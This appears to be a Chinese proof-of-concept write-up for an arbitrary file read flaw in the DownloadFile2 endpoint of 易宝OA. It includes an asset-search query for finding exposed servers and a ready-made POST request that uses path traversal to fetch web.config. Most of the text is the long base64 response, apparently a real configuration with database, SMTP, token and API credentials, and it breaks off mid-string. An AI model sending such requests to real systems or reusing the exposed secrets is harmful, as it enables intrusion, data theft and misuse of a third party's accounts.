源码

易宝OA downloadfile2 任意文件读取漏洞

一、漏洞简介

易宝OA是一款非常强大的手机办公软件，这里不仅为广大的用户提供了一个更好的工作日历，而且每个人都可以在这里进行重要事项的记录，同时软件中还拥有更好的打卡系统，让用户可以快速记录自己的工作时常，而且调班与补卡也会更加的简单，让你工作活跃度得到提升。易宝OA downloadfile2 任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

二、影响版本

易宝OA

三、资产测绘

hunterweb.title="欢迎登录易宝OA系统"||banner="易宝OA"
特征

四、漏洞复现

POST /api/files/DownloadFile2 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Content-Length: 94
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

token=zxh&requestFileName=../../manager/web.config&pathType=1&startPosition=0&bufferSize=1000

77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPGNvbmZpZ3VyYXRpb24+DQogIDxjb25maWdTZWN0aW9ucz4NCiAgICA8IS0tICBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBFbnRpdHkgRnJhbWV3b3JrIGNvbmZpZ3VyYXRpb24sIHZpc2l0IGh0dHA6Ly9nby5taWNyb3NvZnQuY29tL2Z3bGluay8/TGlua0lEPTIzNzQ2OCAgLS0+DQogICAgPHNlY3Rpb24gbmFtZT0iZW50aXR5RnJhbWV3b3JrIiB0eXBlPSJTeXN0ZW0uRGF0YS5FbnRpdHkuSW50ZXJuYWwuQ29uZmlnRmlsZS5FbnRpdHlGcmFtZXdvcmtTZWN0aW9uLCBFbnRpdHlGcmFtZXdvcmssIFZlcnNpb249NC40LjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5IiByZXF1aXJlUGVybWlzc2lvbj0iZmFsc2UiIC8+DQogIDwvY29uZmlnU2VjdGlvbnM+DQogIDxjb25uZWN0aW9uU3RyaW5ncyAvPg0KICA8YXBwU2V0dGluZ3M+DQogICAgPGFkZCBrZXk9InZzOkVuYWJsZUJyb3dzZXJMaW5rIiB2YWx1ZT0iZmFsc2UiIC8+DQogICAgPCEtLSDmlbDmja7lupPov57mjqUgLS0+DQogICAgPGFkZCBrZXk9IlJlcG9ydENvbm5lY3RTdHJpbmciIHZhbHVlPSJEYXRhIFNvdXJjZT0xMjcuMC4wLjEsMTQzMzA7SW5pdGlhbCBDYXRhbG9nPVNtYXJ0VHJhZGVfQTNfUmVwb3J0O1BlcnNpc3QgU2VjdXJpdHkgSW5mbz1UcnVlO1VzZXIgSUQ9c2E7UGFzc3dvcmQ9dG9wdmlzaW9uX2l0czM2NSIgLz4NCiAgICA8YWRkIGtleT0iQ29ubmVjdFN0cmluZyIgdmFsdWU9IkRhdGEgU291cmNlPTEyNy4wLjAuMSwxNDMzMDtJbml0aWFsIENhdGFsb2c9U21hcnRUcmFkZV9BMztQZXJzaXN0IFNlY3VyaXR5IEluZm89VHJ1ZTtVc2VyIElEPXNhO1Bhc3N3b3JkPXRvcHZpc2lvbl9pdHMzNjUiIC8+DQogICAgPCEtLSDmmK/lkKbkuLrosIPor5XmqKHlvI8gLS0+DQogICAgPGFkZCBrZXk9IkRlYnVnIiB2YWx1ZT0iVHJ1ZSIgLz4NCiAgICA8IS0tIOaMh+WumuacjeWKoeWZqOWKoOWvhueLlyzpgILnlKjkuo7lpJrkuKrmnI3liqHlmajnq6/lhbHlrZjkuo7kuIDlj7DkuLvmnLogRW5saXN0PWZhbHNlICBTbWFydFRyYWRlX1JQTVQgLS0+DQogICAgPGFkZCBrZXk9Ikhhc3BJRCIgdmFsdWU9IiIgLz4NCiAgICA8IS0tIOeJiOacrOWPtyAtLT4NCiAgICA8YWRkIGtleT0iU2VydmVyVmVyc2lvbiIgdmFsdWU9IjEyLjAuNi4wIiAvPg0KICAgIDwhLS0g6LaF57qn55So5oi3aUtleee8luWPtyAtLT4NCiAgICA8YWRkIGtleT0iU3VwZXJVc2VySWtleUNvZGUiIHZhbHVlPSI3MDQ4MDAwMEZGRkZDNUJCIiAvPg0KICAgIDwhLS0g55u45YWz5pWw5o2u57G75Z6L5L+d55WZ55qE5bCP5pWw54K5IC0tPg0KICAgIDxhZGQga2V5PSJDdXJyZW5jeUxlbiIgdmFsdWU9IjQiIC8+DQogICAgPGFkZCBrZXk9IlByaWNlTGVuIiB2YWx1ZT0iNiIgLz4NCiAgICA8YWRkIGtleT0iUXR5TGVuIiB2YWx1ZT0iMCIgLz4NCiAgICA8YWRkIGtleT0iQW1vdW50TGVuIiB2YWx1ZT0iMiIgLz4NCiAgICA8IS0tIOebuOWFs+aVsOaNruexu+Wei+aYvuekuuagvOW8jyAtLT4NCiAgICA8YWRkIGtleT0iQ3VycmVuY3lGb3JtYXQiIHZhbHVlPSIjLCMjMC4jIyMjIiAvPg0KICAgIDxhZGQga2V5PSJQcmljZUZvcm1hdCIgdmFsdWU9IiMsIyMwLjAwMDAwMCIgLz4NCiAgICA8YWRkIGtleT0iUXR5Rm9ybWF0IiB2YWx1ZT0iIywjIzAiIC8+DQogICAgPGFkZCBrZXk9IkFtb3VudEZvcm1hdCIgdmFsdWU9IiMsIyMwLjAwIiAvPg0KICAgIDwhLS0g5a+G56CB55u45YWzIC0tPg0KICAgIDxhZGQga2V5PSJUb2tlbktleSIgdmFsdWU9Ikl1S0pkODkwOSIgLz4NCiAgICA8YWRkIGtleT0iV2ViU2VydmljZVBhc3N3b3JkIiB2YWx1ZT0ie2FjODA0NTdiLTM2OGQtNDA2Mi1iMmRkLWFlNGQ0OTBlMWM0Yn0iIC8+DQogICAgPCEtLSDlrqLmiLfnq6/nmbvlvZXml7bmmK/lkKbpnIDopoFpS2V5IC0tPg0KICAgIDxhZGQga2V5PSJVU0JLRVkiIHZhbHVlPSJGYWxzZSIgLz4NCiAgICA8IS0tIOWuouaIt+err+iOt+WPlua2iOaBr+eahOaXtumXtOmXtOmalChzKSAtLT4NCiAgICA8YWRkIGtleT0iTWVzc2FnZVRpbWVJbnRlcnZhbCIgdmFsdWU9IjMwIiAvPg0KICAgIDwhLS0g5pel56iL566h55CG5omA5Zyo5qih5Z2X5ZCN56ew44CBRm9ybeWQjeensCjku6U75YiG6ZqUKSAtLT4NCiAgICA8YWRkIGtleT0iU2NoZWR1bGVBc3NlbWJseVNldHRpbmciIHZhbHVlPSJGZXMuU2NoZWR1bGVfQ3VzdG9taXplLmV4ZTtGZXMuU2NoZWR1bGVfQ3VzdG9taXplLmZybVNjaGVkdWxlTGlzdCIgLz4NCiAgICA8IS0tIOWuouaIt+err+aWh+S7tuabtOaWsOWcsOWdgCAtLT4NCiAgICA8YWRkIGtleT0iQ2xpZW50VXBkYXRlVVJMIiB2YWx1ZT0iaHR0cDovL3VwZGF0ZS5pdHMzNjUubmV0IiAvPg0KICAgIDwhLS0g5piv5ZCm5ZCv55So5a6i5oi35YiG5pSvIC0tPg0KICAgIDxhZGQga2V5PSJFbmFibGVDdXN0b21lckJyYW5jaCIgdmFsdWU9IkZhbHNlIiAvPg0KICAgIDwhLS0g5piv5ZCm5ZCv55So5L6b5bqU5ZWG5YiG5pSvIC0tPg0KICAgIDxhZGQga2V5PSJFbmFibGVTdXBwbGllckJyYW5jaCIgdmFsdWU9IkZhbHNlIiAvPg0KICAgIDwhLS0g5omT5Y2w5qC85byP5qih5p2/5paH5Lu25aS5IC0tPg0KICAgIDwhLS0g5omT5Y2w5qC85byP5qih5p2/5paH5Lu25aS5IC0tPg0KICAgIDxhZGQga2V5PSJScHRGaWxlRm9sZGVyIiB2YWx1ZT0iRDpcVG9wdmlzaW9uXFNtYXJ0VHJhZGVTZXJ2ZXJcVXBMb2FkUGF0aFxycHQiIC8+DQogICAgPCEtLSDmoIflh4bmlofmoaPlrZjmlL7mlofku7blpLkgLS0+DQogICAgPGFkZCBrZXk9IlVwTG9hZFBhdGgiIHZhbHVlPSJEOlxUb3B2aXNpb25cU21hcnRUcmFkZVNlcnZlclxVcExvYWRQYXRoIiAvPg0KICAgIDwhLS0g5Liq5Lq65paH5qGj5a2Y5pS+5paH5Lu25aS5IC0tPg0KICAgIDxhZGQga2V5PSJQZXJzb25hbERvY3VtZW50VXBMb2FkUGF0aCIgdmFsdWU9IkQ6XFRvcHZpc2lvblxTbWFydFRyYWRlU2VydmVyXFVwTG9hZFBhdGhcUGVyc29uYWxEb2N1bWVudCIgLz4NCiAgICA8IS0tIOWVhuWtpumZouaWh+aho+WtmOaUvuaWh+S7tuWkuSAtLT4NCiAgICA8YWRkIGtleT0iRWR1VXBMb2FkUGF0aCIgdmFsdWU9IkQ6XEVkdVVwTG9hZFBhdGgiIC8+DQogICAgPCEtLSDljZXmja7mlofmoaPlrZjmlL7mlofku7blpLkgLS0+DQogICAgPGFkZCBrZXk9IkJpbGxVcExvYWRQYXRoIiB2YWx1ZT0iRDpcVG9wdmlzaW9uXFNtYXJ0VHJhZGVTZXJ2ZXJcVXBMb2FkUGF0aFxCaWxsVXBMb2FkUGF0aCIgLz4NCiAgICA8IS0tIOafpeivouaVsOaNruS7u+WKoeeUn+aIkEV4Y2xl5paH5Lu255uu5b2VIC0tPg0KICAgIDxhZGQga2V5PSJUYXNrRXhjZWxVcExvYWRQYXRoIiB2YWx1ZT0iRDpcVG9wdmlzaW9uXFNtYXJ0VHJhZGVTZXJ2ZXJcVXBMb2FkUGF0aFxUYXNrRXhjZWxVcExvYWRQYXRoIiAvPg0KICAgIDwhLS0g5pel5b+X6K6w5b2V57qn5YirIDA65LiN6K6w5b2VIDE6566A5Y2VIDI65aSN5p2CIDM65YWo6YOoIC0tPg0KICAgIDxhZGQga2V5PSJMb2dMZXZlbCIgdmFsdWU9IjEiIC8+DQogICAgPCEtLSDnmbvlvZXnqpflj6PmmL7npLrmoLflvI8gMDrpu5jorqQgMTrnroDljZUgMjrpmpDol48gLS0+DQogICAgPGFkZCBrZXk9IkxvZ2luRm9ybVN0eWxlIiB2YWx1ZT0iMCIgLz4NCiAgICA8IS0tIFNRTOaJp+ihjOi2heaXtuaXtumXtCAtLT4NCiAgICA8YWRkIGtleT0iU1FMQ29tbWFuZFJ1blRpbWVvdXQiIHZhbHVlPSIxMDAwIiAvPg0KICAgIDwhLS0g5bqU5pS25bqU5LuY5p+l6K+i5pe26YeR6aKd5bqU6K+l5Zub6IiN5LqU5YWl55qE5bCP5pWw54K5IC0tPg0KICAgIDxhZGQga2V5PSJTZWFyY2hGaW5hbmNpYWxMZW4iIHZhbHVlPSIzIiAvPg0KICAgIDwhLS0gIOi/nOeoi+WNj+WKqeacjeWKoeWVhiAwOnR0dm5jIDE6aW5mb2NhcmUgIC0tPg0KICAgIDxhZGQga2V5PSJWTkNTcG9uc29ySUQiIHZhbHVlPSIwIiAvPg0KICAgIDwhLS0gIOi/nOeoi+WNj+WKqeacjeWKoeWZqOWcsOWdgCAtLT4NCiAgICA8YWRkIGtleT0iVk5DU2VydmVyQWRkcmVzcyIgdmFsdWU9InZuYy5pdHMzNjUubmV0IiAvPg0KICAgIDwhLS0gIOi/nOeoi+WNj+WKqeacjeWKoeWZqOerr+WPoyAtLT4NCiAgICA8YWRkIGtleT0iVk5DU2VydmVyUG9ydCIgdmFsdWU9IjIzIiAvPg0KICAgIDwhLS0gIOW4ruWKqeaWh+aho+acjeWKoeWZqCAtLT4NCiAgICA8YWRkIGtleT0iSGVscFNlcnZlckFkZHJlc3MiIHZhbHVlPSJoZWxwLnRvcHZpc2lvbi5tZSIgLz4NCiAgICA8IS0tICDpgq7ku7bphY3nva4gU3RhcnQgLS0+DQogICAgPGFkZCBrZXk9IlVzZURlZmF1bHRDcmVkZW50aWFscyIgdmFsdWU9ImZhbHNlIiAvPg0KICAgIDxhZGQga2V5PSJTTVRQRW5hYmxlU1NMIiB2YWx1ZT0iVHJ1ZSIgLz4NCiAgICA8YWRkIGtleT0iU01UUEhvc3QiIHZhbHVlPSJzbXRwLnFxLmNvbSIgLz4NCiAgICA8YWRkIGtleT0iU01UUFBvcnQiIHZhbHVlPSI1ODciIC8+DQogICAgPGFkZCBrZXk9IlNNVFBVc2VyIiB2YWx1ZT0iMzA4MDAyNDQ1MkBxcS5jb20iIC8+DQogICAgPGFkZCBrZXk9IlNNVFBDQyIgdmFsdWU9IiIgLz4NCiAgICA8YWRkIGtleT0iU01UUFBhc3N3b3JkIiB2YWx1ZT0ib2ZwanlseHJiYXBlZGVhZSIgLz4NCiAgICA8YWRkIGtleT0iU01UUEZyb20iIHZhbHVlPSIzMDgwMDI0NDUyQHFxLmNvbSIgLz4NCiAgICA8IS0tICDpgq7ku7bphY3nva4gRW5kIC0tPg0KICAgIDwhLS0g5pu05paw5pyN5Yqh5omA5Zyo6Lev5b6EIC0tPg0KICAgIDxhZGQga2V5PSJVcGRhdGVTZXJ2aWNlUGF0aCIgdmFsdWU9IkQ6XFRvcHZpc2lvblxTbWFydFRyYWRlU2VydmVyXHVwZGF0ZSIgLz4NCiAgICA8IS0tIOWkh+S7veacjeWKoeaJgOWcqOi3r+W+hCAtLT4NCiAgICA8YWRkIGtleT0iQmFja3VwU2VydmljZVBhdGgiIHZhbHVlPSJEOlxUb3B2aXNpb25cU21hcnRUcmFkZVNlcnZlclxCYWNrdXAiIC8+DQogICAgPCEtLSDmtojmga/mnI3liqHmiYDlnKjot6/lvoQgLS0+DQogICAgPGFkZCBrZXk9Ik1lc3NhZ2VTZXJ2aWNlUGF0aCIgdmFsdWU9IkQ6XFRvcHZpc2lvblxTbWFydFRyYWRlU2VydmVyXE1lc3NhZ2UiIC8+DQogICAgPCEtLSDku7vliqHorqHliJLmnI3liqHmiYDlnKjot6/lvoQgLS0+DQogICAgPGFkZCBrZXk9IlRhc2tTZXJ2aWNlUGF0aCIgdmFsdWU9IkQ6XFRvcHZpc2lvblxTbWFydFRyYWRlU2VydmVyXFRhc2siIC8+DQogICAgPCEtLSBTYWZlTmV05Zyw5Z2AIC0tPg0KICAgIDxhZGQga2V5PSJTYWZlTmV0VXJpIiB2YWx1ZT0ibG9jYWxob3N0OjE5NDciIC8+DQogICAgPCEtLSAg55+t5L+h6YWN572uIFN0YXJ0IC0tPg0KICAgIDxhZGQga2V5PSJTTVNTZXJ2ZXIiIHZhbHVlPSJodHRwOi8vc21zLml0czM2NS5uZXQvU01TU2VuZC5hc3B4IiAvPg0KICAgIDxhZGQga2V5PSJTTVNVc2VyTmFtZSIgdmFsdWU9IiIgLz4NCiAgICA8YWRkIGtleT0iU01TUGFzc3dvcmQiIHZhbHVlPSIiIC8+DQogICAgPCEtLSAg5a6J5Y2T54mI5pysIC0tPg0KICAgIDxhZGQga2V5PSJBbmRSb2lkVmVyc2lvbiIgdmFsdWU9IjEuNi43LjQiIC8+DQogICAgPGFkZCBrZXk9IkFuZFJvaWREb3duTG9hZFVybCIgdmFsdWU9Imh0dHA6Ly93d3cuaXRzMzY1Lm5ldDo4MDgwLyIgLz4NCiAgICA8IS0tICDlronljZNBUFDniYjmnKwgLS0+DQogICAgPGFkZCBrZXk9IkFuZFJvaWRBUFBWZXJzaW9uIiB2YWx1ZT0iMS4xLjEiIC8+DQogICAgPGFkZCBrZXk9IkFuZFJvaWRBUFBEb3duTG9hZFVybCIgdmFsdWU9Imh0dHA6Ly93d3cuaXRzMzY1Lm5ldDo4MDgwLyIgLz4NCiAgICA8IS0tICBUVueJiOacrCAtLT4NCiAgICA8YWRkIGtleT0iVFZBcHBWZXJzaW9uIiB2YWx1ZT0iMS4wLjAuNyIgLz4NCiAgICA8YWRkIGtleT0iVFZBcHBWZXJzaW9uRG93bkxvYWRVcmwiIHZhbHVlPSJodHRwOi8vd3d3Lml0czM2NS5uZXQ6ODA4MC9UVi8iIC8+DQogICAgPCEtLSAg5raI5oGv5o6o6YCB54mI5pysIC0tPg0KICAgIDxhZGQga2V5PSJBUFBJRCIgdmFsdWU9IlFuelVNREdRaEs3MkFleU9MSWl5ejIiIC8+DQogICAgPGFkZCBrZXk9IkFQUEtFWSIgdmFsdWU9ImJ5NlR1bGFseks3NkZwQzQ1MExaeSIgLz4NCiAgICA8YWRkIGtleT0iTUFTVEVSU0VDUkVUIiB2YWx1ZT0ieWc5OFRMbEhITDZFdjA5UGg5ZzhINiIgLz4NCiAgICA8YWRkIGtleT0id2VicGFnZXM6RW5hYmxlZCIgdmFsdWU9ImZhbHNlIiAvPg0KICAgIDxhZGQga2V5PSJQcmVzZXJ2ZUxvZ2luVXJsIiB2YWx1ZT0idHJ1ZSIgLz4NCiAgICA8YWRkIGtleT0iQ2xpZW50VmFsaWRhdGlvbkVuYWJsZWQiIHZhbHVlPSJ0cnVlIiAvPg0KICAgIDxhZGQga2V5PSJVbm9idHJ1c2l2ZUphdmFTY3JpcHRFbmFibGVkIiB2YWx1ZT0idHJ1ZSIgLz4NCiAgICA8IS0tICAgWVVO5pyN5Yqh5omN5pyJ77yM5YW25a6D5pyN5Yqh5Zmo5Y+v5Yig6Zmk5oiW5YC8IOS4ujAgLS0+DQogICAgPGFkZCBrZXk9Ill1bkFQUCIgdmFsdWU9IjAiIC8+DQogICAgPCEtLSAgIEFQUCAtLT4NCiAgICA8YWRkIGtleT0iQXBwVXNlck51bSIgdmFsdWU9ImhlUTE3cjJsa3JNUURESU5HdjdUdHc9PSIgLz4NCiAgICA8YWRkIGtleT0iU2NhblVzZXJOdW0iIHZhbHVlPSJJRVE4MmRmeGdlZ1BQNHR2ZVZnampBPT0iIC8+DQogICAgPCEtLSDlupPlrZjnvJPlrZjlip/og70gIOm7mOiupDDkuI3lvIDlkK8gMeW8gOWQryAtLT4NCiAgICA8YWRkIGtleT0iUHJvZHVjdEludmVudG9yeUNhY2hlU2VydmVyIiB2YWx1ZT0iMCIgLz4NCiAgICA8YWRkIGtleT0iUHJvTWF0ZXJpZWxBcnJhbmdlRWZmZWN0IiB2YWx1ZT0iMCIgLz4NCiAgICA8IS0tIOWvueWkluW8gOaUvkFQSeWKoOWvhktFWSAtLT4NCiAgICA8YWRkIGtleT0iQVBJS0VZIiB2YWx1ZT0iYnk2VHVsYWw4NXpLNzZGcEMxNDUwTEZDWCIgLz4NCiAgPC9hcHBTZXR0aW5ncz4NCiAgPCEtLSDkuIvpnaLnmoTlnKjlpJrkuKrlrZDnm67lvZXmg4XlhrXkuIvpnIDopoEgLS0+DQogIDwhLS0gPGxvY2F0aW9uIHBhdGg9Ii4iIGFsbG93T3ZlcnJpZGU9ImZhbHNlIiBpbmhlcml0SW5DaGlsZEFwcGxpY2F0aW9ucz0iZmFsc2UiLz4gLS0+DQogIDxzeXN0ZW0ud2ViPg0KICAgIDwhLS0gPGdsb2JhbGl6YXRpb24gcmVxdWVzdEVuY29kaW5nPSJnYjIzMTIiIHJlc3BvbnNlRW5jb2Rpbmc9ImdiMjMxMiIgY3VsdHVyZT0iemgtQ04iIGZpbGVFbmNvZGluZz0iZ2IyMzEyIiAvPiAtLT4NCiAgICA8IS0tIDxnbG9iYWxpemF0aW9uIHJlcXVlc3RFbmNvZGluZz0idXRmLTgiIHJlc3BvbnNlRW5jb2Rpbmc9InV0Zi04Ii8+IC0tPg0KICAgIDxjdXN0b21FcnJvcnMgbW9kZT0iT2ZmIiBkZWZhdWx0UmVkaXJlY3Q9Ii9FcnJQYWdlIiAvPg0KICAgIDxjb21waWxhdGlvbiB0YXJnZXRGcmFtZXdvcms9IjQuMCIgLz4NCiAgICA8YXV0aGVudGljYXRpb24gbW9kZT0iTm9uZSIgLz4NCiAgICA8aHR0cFJ1bnRpbWUgbWF4UmVxdWVzdExlbmd0aD0iMTAyNDAwIiB1c2VGdWxseVF1YWxpZmllZFJlZGlyZWN0VXJsPSJmYWxzZSIgZXhlY3V0aW9uVGltZW91dD0iOTUxMjAwIiBtaW5GcmVlVGhyZWFkcz0iOCIgbWluTG9jYWxSZXF1ZXN0RnJlZVRocmVhZHM9IjQiIGFwcFJlcXVlc3RRdWV1ZUxpbWl0PSIxMDAwMCIgZW5hYmxlVmVyc2lvbkhlYWRlcj0idHJ1ZSIgLz4NCiAgICA8cGFnZXMgY29udHJvbFJlbmRlcmluZ0NvbXBhdGliaWxpdHlWZXJzaW9uPSI0LjAiIHZhbGlkYXRlUmVxdWVzdD0iZmFsc2UiPg0KICAgICAgPG5hbWVzcGFjZXM+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLkhlbHBlcnMiIC8+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLk12YyIgLz4NCiAgICAgICAgPGFkZCBuYW1lc3BhY2U9IlN5c3RlbS5XZWIuTXZjLkFqYXgiIC8+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLk12Yy5IdG1sIiAvPg0KICAgICAgICA8YWRkIG5hbWVzcGFjZT0iU3lzdGVtLldlYi5PcHRpbWl6YXRpb24iIC8+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLlJvdXRpbmciIC8+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLldlYlBhZ2VzIiAvPg0KICAgICAgPC9uYW1lc3BhY2VzPg0KICAgIDwvcGFnZXM+DQogICAgPHByb2ZpbGUgZGVmYXVsdFByb3ZpZGVyPSJEZWZhdWx0UHJvZmlsZVByb3ZpZGVyIj4NCiAgICAgIDxwcm92aWRlcnM+DQogICAgICAgIDxhZGQgbmFtZT0iRGVmYXVsdFByb2ZpbGVQcm92aWRlciIgdHlwZT0iU3lzdGVtLldlYi5Qcm92aWRlcnMuRGVmYXVsdFByb2ZpbGVQcm92aWRlciwgU3lzdGVtLldlYi5Qcm92aWRlcnMsIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1IiBjb25uZWN0aW9uU3RyaW5nTmFtZT0iRGVmYXVsdENvbm5lY3Rpb24iIGFwcGxpY2F0aW9uTmFtZT0iLyIgLz4NCiAgICAgIDwvcHJvdmlkZXJzPg0KICAgIDwvcHJvZmlsZT4NCiAgICA8bWVtYmVyc2hpcCBkZWZhdWx0UHJvdmlkZXI9IkRlZmF1bHRNZW1iZXJzaGlwUHJvdmlkZXIiPg0KICAgICAgPHByb3ZpZGVycz4NCiAgICAgICAgPGFkZCBuYW1lPSJEZWZhdWx0TWVtYmVyc2hpcFByb3ZpZGVyIiB0eXBlPSJTeXN0ZW0uV2ViLlByb3ZpZGVycy5EZWZhdWx0TWVtYmVyc2hpcFByb3ZpZGVyLCBTeXN0ZW0uV2ViLlByb3ZpZGVycywgVmVyc2lvbj0xLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUiIGNvbm5lY3Rpb25TdHJpbmdOYW1lPSJEZWZhdWx0Q29ubmVjdGlvbiIgZW5hYmxlUGFzc3dvcmRSZXRyaWV2YWw9ImZhbHNlIiBlbmFibGVQYXNzd29yZFJlc2V0PSJ0cnVlIiByZXF1aXJlc1F1ZXN0aW9uQW5kQW5zd2VyPSJmYWxzZSIgcmVxdWlyZXNVbmlxdWVFbWFpbD0iZmFsc2UiIG1heEludmFsaWRQYXNzd29yZEF0dGVtcHRzPSI1IiBtaW5SZXF1aXJlZFBhc3N3b3JkTGVuZ3RoPSI2IiBtaW5SZXF1aXJlZE5vbmFscGhhbnVtZXJpY0NoYXJhY3RlcnM9IjAiIHBhc3N3b3JkQXR0ZW1wdFdpbmRvdz0iMTAiIGFwcGxpY2F0aW9uTmFtZT0iLyIgLz4NCiAgICAgIDwvcHJvdmlkZXJzPg0KICAgIDwvbWVtYmVyc2hpcD4NCiAgICA8cm9sZU1hbmFnZXIgZGVmYXVsdFByb3ZpZGVyPSJEZWZhdWx0Um9sZVByb3ZpZGVyIj4NCiAgICAgIDxwcm92aWRlcnM+DQogICAgICAgIDxhZGQgbmFtZT0iRGVmYXVsdFJvbGVQcm92aWRlciIgdHlwZT0iU3lzdGVtLldlYi5Qcm92aWRlcnMuRGVmYXVsdFJvbGVQcm92aWRlciwgU3lzdGVtLldlYi5Qcm92aWRlcnMsIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1IiBjb25uZWN0aW9uU3RyaW5nTmFtZT0iRGVmYXVsdENvbm5lY3Rpb24iIGFwcGxpY2F0aW9uTmFtZT0iLyIgLz4NCiAgICAgIDwvcHJvdmlkZXJzPg0KICAgIDwvcm9sZU1hbmFnZXI+DQogICAgPCEtLSANCiAgICAgICAgICAgIElmIHlvdSBhcmUgZGVwbG95aW5nIHRvIGEgY2xvdWQgZW52aXJvbm1lbnQgdGhhdCBoYXMgbXVsdGlwbGUgd2ViIHNlcnZlciBpbnN0YW5jZXMsDQogICAgICAgICAgICB5b3Ugc2hvdWxkIGNoYW5nZSBzZXNzaW9uIHN0YXRlIG1vZGUgZnJvbSAiSW5Qcm9jIiB0byAiQ3VzdG9tIi4gSW4gYWRkaXRpb24sDQogICAgICAgICAgICBjaGFuZ2UgdGhlIGNvbm5lY3Rpb24gc3RyaW5nIG5hbWVkICJEZWZhdWx0Q29ubmVjdGlvbiIgdG8gY29ubmVjdCB0byBhbiBpbnN0YW5jZQ0KICAgICAgICAgICAgb2YgU1FMIFNlcnZlciAoaW5jbHVkaW5nIFNRTCBBenVyZSBhbmQgU1FMICBDb21wYWN0KSBpbnN0ZWFkIG9mIHRvIFNRTCBTZXJ2ZXIgRXhwcmVzcy4NCiAgICAgICAtLT4NCiAgICA8c2Vzc2lvblN0YXRlIG1vZGU9IkluUHJvYyIgdGltZW91dD0iMSIgY3VzdG9tUHJvdmlkZXI9IkRlZmF1bHRTZXNzaW9uUHJvdmlkZXIiPg0KICAgICAgPHByb3ZpZGVycz4NCiAgICAgICAgPGFkZCBuYW1lPSJEZWZhdWx0U2Vzc2lvblByb3ZpZGVyIiB0eXBlPSJTeXN0ZW0uV2ViLlByb3ZpZGVycy5EZWZhdWx0U2Vzc2lvblN0YXRlUHJvdmlkZXIsIFN5c3RlbS5XZWIuUHJvdmlkZXJzLCBWZXJzaW9uPTEuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNSIgY29ubmVjdGlvblN0cmluZ05hbWU9IkRlZmF1bHRDb25uZWN0aW9uIiAvPg0KICAgICAgPC9wcm92aWRlcnM+DQogICAgPC9zZXNzaW9uU3RhdGU+DQogIDwvc3lzdGVtLndlYj4NCiAgPHN5c3RlbS53ZWJTZXJ2ZXI+DQogICAgPGh0dHBQcm90b2NvbD4NCiAgICAgIDxjdXN0b21IZWFkZXJzPg0KICAgICAgICA8YWRkIG5hbWU9IkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbiIgdmFsdWU9IioiIC8+DQogICAgICAgIDxhZGQgbmFtZT0iQWNjZXNzLUNvbnRyb2wtTWF4LUFnZSIgdmFsdWU9IjMwIiAvPg0KICAgICAgICA8YWRkIG5hbWU9IkFjY2Vzcy1Db250cm9sLUFsbG93LU1ldGhvZHMiIHZhbHVlPSJHRVQsUE9TVCxPUFRJT05TIiAvPg0KICAgICAgICA8YWRkIG5hbWU9IkFjY2Vzcy1Db250cm9sLUFsbG93LUhlYWRlcnMiIHZhbHVlPSJDb250ZW50LVR5cGUsIEFjY2VwdCIgLz4NCiAgICAgIDwvY3VzdG9tSGVhZGVycz4NCiAgICA8L2h0dHBQcm90b2NvbD4NCiAgICA8dmFsaWRhdGlvbiB2YWxpZGF0ZUludGVncmF0ZWRNb2RlQ29uZmlndXJhdGlvbj0iZmFsc2UiIC8+DQogICAgPG1vZHVsZXMgcnVuQWxsTWFuYWdlZE1vZHVsZXNGb3JBbGxSZXF1ZXN0cz0idHJ1ZSIgLz4NCiAgICA8aGFuZGxlcnM+DQogICAgICA8cmVtb3ZlIG5hbWU9IkV4dGVuc2lvbmxlc3NVcmxIYW5kbGVyLUlTQVBJLTQuMF8zMmJpdCIgLz4NCiAgICAgIDxyZW1vdmUgbmFtZT0iRXh0ZW5zaW9ubGVzc1VybEhhbmRsZXItSVNBUEktNC4wXzY0Yml0IiAvPg0KICAgICAgPHJlbW92ZSBuYW1lPSJFeHRlbnNpb25sZXNzVXJsSGFuZGxlci1JbnRlZ3JhdGVkLTQuMCIgLz4NCiAgICAgIDxhZGQgbmFtZT0iRXh0ZW5zaW9ubGVzc1VybEhhbmRsZXItSVNBUEktNC4wXzMyYml0IiBwYXRoPSIqLiIgdmVyYj0iR0VULEhFQUQsUE9TVCxERUJVRyxQVVQsREVMRVRFLFBBVENILE9QVElPTlMiIG1vZHVsZXM9IklzYXBpTW9kdWxlIiBzY3JpcHRQcm9jZXNzb3I9IiV3aW5kaXIlXE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcYXNwbmV0X2lzYXBpLmRsbCIgcHJlQ29uZGl0aW9uPSJjbGFzc2ljTW9kZSxydW50aW1lVmVyc2lvbnY0LjAsYml0bmVzczMyIiByZXNwb25zZUJ1ZmZlckxpbWl0PSIwIiAvPg0KICAgICAgPGFkZCBuYW1lPSJFeHRlbnNpb25sZXNzVXJsSGFuZGxlci1JU0FQSS00LjBfNjRiaXQiIHBhdGg9IiouIiB2ZXJiPSJHRVQsSEVBRCxQT1NULERFQlVHLFBVVCxERUxFVEUsUEFU